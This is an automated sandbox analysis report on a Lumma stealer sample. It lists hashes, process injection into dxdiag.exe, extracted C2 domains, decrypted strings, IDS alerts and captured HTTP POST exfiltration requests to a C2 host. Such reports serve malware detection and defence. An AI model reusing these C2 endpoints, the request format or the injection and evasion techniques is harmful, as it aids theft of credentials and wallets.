Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bas.exe

Overview

General Information

Sample name:bas.exe
Analysis ID:1579571
MD5:d5139ae53cb10a64c9245bbf3447ed1c
SHA1:727199337e080c162fd86558a697b3bcbce646e1
SHA256:8ad2dcb075a7da5785530bc805b5391a397e1c659bedcb564774b6940b7fcbed
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • bas.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\bas.exe" MD5: D5139AE53CB10A64C9245BBF3447ED1C)
    • dxdiag.exe (PID: 7516 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
    • dxdiag.exe (PID: 7524 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["energyaffai.lat", "crosshuaht.lat", "aspecteirs.lat", "volcanohushe.click", "discokeyus.lat", "rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "necklacebudi.lat"], "Build id": "pqZnKP--ZnVja2luZ1"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: dxdiag.exe PID: 7524JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: dxdiag.exe PID: 7524JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-23T01:22:09.042301+010020283713Unknown Traffic192.168.2.849706104.21.71.155443TCP
            2024-12-23T01:22:11.200792+010020283713Unknown Traffic192.168.2.849707104.21.71.155443TCP
            2024-12-23T01:22:13.656018+010020283713Unknown Traffic192.168.2.849708104.21.71.155443TCP
            2024-12-23T01:22:16.080339+010020283713Unknown Traffic192.168.2.849709104.21.71.155443TCP
            2024-12-23T01:22:18.557909+010020283713Unknown Traffic192.168.2.849710104.21.71.155443TCP
            2024-12-23T01:22:21.368165+010020283713Unknown Traffic192.168.2.849712104.21.71.155443TCP
            2024-12-23T01:22:23.820880+010020283713Unknown Traffic192.168.2.849713104.21.71.155443TCP
            2024-12-23T01:22:27.362380+010020283713Unknown Traffic192.168.2.849714104.21.71.155443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-23T01:22:09.919391+010020546531A Network Trojan was detected192.168.2.849706104.21.71.155443TCP
            2024-12-23T01:22:11.956641+010020546531A Network Trojan was detected192.168.2.849707104.21.71.155443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-23T01:22:09.919391+010020498361A Network Trojan was detected192.168.2.849706104.21.71.155443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-23T01:22:11.956641+010020498121A Network Trojan was detected192.168.2.849707104.21.71.155443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-23T01:22:22.132533+010020480941Malware Command and Control Activity Detected192.168.2.849712104.21.71.155443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "crosshuaht.lat", "aspecteirs.lat", "volcanohushe.click", "discokeyus.lat", "rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "necklacebudi.lat"], "Build id": "pqZnKP--ZnVja2luZ1"}
            Source: bas.exeReversingLabs: Detection: 26%
            Source: bas.exeVirustotal: Detection: 30%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crosshuaht.lat
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sustainskelet.lat
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: aspecteirs.lat
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: energyaffai.lat
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: necklacebudi.lat
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: discokeyus.lat
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: volcanohushe.click
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000003.00000002.1631470518.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: pqZnKP--ZnVja2luZ1
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: bas.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
            Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: number of queries: 1001

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49707 -> 104.21.71.155:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 104.21.71.155:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 104.21.71.155:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.71.155:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49712 -> 104.21.71.155:443
            Source: Malware configuration extractorURLs: energyaffai.lat
            Source: Malware configuration extractorURLs: crosshuaht.lat
            Source: Malware configuration extractorURLs: aspecteirs.lat
            Source: Malware configuration extractorURLs: volcanohushe.click
            Source: Malware configuration extractorURLs: discokeyus.lat
            Source: Malware configuration extractorURLs: rapeflowwj.lat
            Source: Malware configuration extractorURLs: sustainskelet.lat
            Source: Malware configuration extractorURLs: grannyejh.lat
            Source: Malware configuration extractorURLs: necklacebudi.lat
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.71.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.71.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.71.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.71.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.71.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.71.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.21.71.155:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.71.155:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanohushe.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: volcanohushe.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MA0CHNK04GEMHC3RI7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12851Host: volcanohushe.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QYJM3V1ZQPMPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15044Host: volcanohushe.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=95LDDMB43LT0XKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20223Host: volcanohushe.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZEM9UWIBZYJTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1208Host: volcanohushe.click
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2IWMDEENI15User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571518Host: volcanohushe.click
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: volcanohushe.click
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanohushe.click
            Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
            Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
            Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
            Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
            Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: dxdiag.exe, 00000003.00000003.1558445081.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579174438.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620904755.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1558296148.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1621063252.0000000002CE6000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579403717.0000000002CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click
            Source: dxdiag.exe, 00000003.00000003.1479470457.0000000002D04000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579103745.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479269620.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479395130.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620854063.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596299613.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/
            Source: dxdiag.exe, 00000003.00000002.1631649522.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596096341.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620854063.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596299613.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/H
            Source: dxdiag.exe, 00000003.00000003.1579103745.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620854063.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002D21000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596299613.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1528700860.0000000005163000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/api
            Source: dxdiag.exe, 00000003.00000002.1631649522.0000000002D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/apiBG
            Source: dxdiag.exe, 00000003.00000003.1479269620.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479470457.0000000002D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/apiH
            Source: dxdiag.exe, 00000003.00000003.1528700860.0000000005163000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/apie
            Source: dxdiag.exe, 00000003.00000003.1621063252.0000000002D05000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579174438.0000000002D05000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/apie4
            Source: dxdiag.exe, 00000003.00000003.1528700860.0000000005163000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/apieO
            Source: dxdiag.exe, 00000003.00000003.1579103745.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/apif
            Source: dxdiag.exe, 00000003.00000002.1631649522.0000000002D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/apis
            Source: dxdiag.exe, 00000003.00000003.1579563478.0000000002D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/k
            Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
            Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
            Source: dxdiag.exe, 00000003.00000003.1530198927.000000000525A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
            Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
            Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: dxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.71.155:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D07E513_3_02D07E51
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D07E513_3_02D07E51
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D07E513_3_02D07E51
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D07E513_3_02D07E51
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/0@1/1
            Source: bas.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\bas.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
